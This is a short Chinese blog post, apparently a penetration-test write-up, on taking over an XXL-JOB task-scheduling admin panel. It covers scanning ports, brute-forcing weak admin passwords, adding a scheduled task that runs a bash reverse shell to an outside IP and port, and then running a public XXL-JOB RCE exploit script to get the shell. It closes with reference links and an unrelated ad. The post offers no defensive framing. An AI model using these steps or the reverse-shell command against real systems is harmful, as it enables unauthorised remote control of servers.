XXL-JOB(任务调度中心)-反弹getshell

XXL-JOB(任务调度中心)-反弹getshell

常规扫描

端口扫描扫出来9999 百度得出是xxl-job服务并爆出后台默认路径

http://172.168.83.36:8080/xxl-job-admin/jobinfo

后台登录没有验证码尝试爆破一下弱口令

添加定时任务

bash反弹命令

/bin/bash -i >& /dev/tcp/172.168.30.45/5555 0>&1

命令执行不成功 bash会话并没有反弹

下载漏洞exp

python3 E:xxl-job-rce-mainxxl-job-rce exe-code.py

成功反弹

参考

[1] https://github.com/mrknow001/xxl-job-rce

[2] https://www.cnblogs.com/kbhome/p/13210394.html

【推广】免费学中医，健康全家人

原文地址：https://www.cnblogs.com/yujin2020/p/14310615.html